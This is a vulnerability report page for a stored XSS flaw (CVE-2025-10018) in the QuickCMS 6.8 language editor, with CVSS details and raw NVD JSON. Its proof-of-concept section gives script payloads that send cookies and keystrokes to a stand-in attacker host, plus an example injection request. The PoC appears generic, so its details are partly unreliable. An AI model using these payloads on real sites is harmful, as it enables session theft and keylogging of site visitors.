Security Vulnerability Report
CVE-2025-10018 CVSS 4.8 MEDIUM

CVE-2025-10018

Published: 2025-11-14 14:15:44
Last Modified: 2025-11-17 19:26:29

Description

QuickCMS is vulnerable to multiple Stored XSS vulnerabilities in the language editor functionality (languages). A malicious attacker with admin privileges can inject arbitrary HTML and JS into the website, which will be rendered/executed on every page. By default, an admin user is not able to add JavaScript to the website. The vendor was notified early about this vulnerability, but did not respond with details of the vulnerability or the vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE
QuickCMS 6.8 (confirmed vulnerable)
Other QuickCMS versions (possibly affected, not yet tested)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-10018 PoC - Stored XSS in QuickCMS Language Editor -->
<!-- This PoC demonstrates the stored XSS vulnerability in QuickCMS languages editor -->

<!-- Step 1: Login to QuickCMS admin panel with admin credentials -->
<!-- URL: /admin.php?p=languages -->

<!-- Step 2: Inject malicious JavaScript into language field -->
<!-- Example payload in language editor: -->
<script>
  // Steal session cookies
  fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie))
</script>

<!-- Alternative payload - keylogger -->
<img src=x onerror='document.onkeypress=function(e){fetch("https://attacker.com/log?k="+e.key)}'>

<!-- Alternative payload - session hijacking -->
<script>
  document.location='https://attacker.com/cookie?c='+document.cookie
</script>

<!-- Step 3: Save the language modification -->
<!-- The malicious script is now stored and will execute on all pages -->

<!-- HTTP Request Example -->
POST /admin.php?p=languages&action=save HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=admin_session

id=1&key=site_name&value=<script>alert('XSS')</script>&lang=en

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10018", "sourceIdentifier": "[email protected]", "published": "2025-11-14T14:15:44.380", "lastModified": "2025-11-17T19:26:29.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in language editor functionality (languages). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-9982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}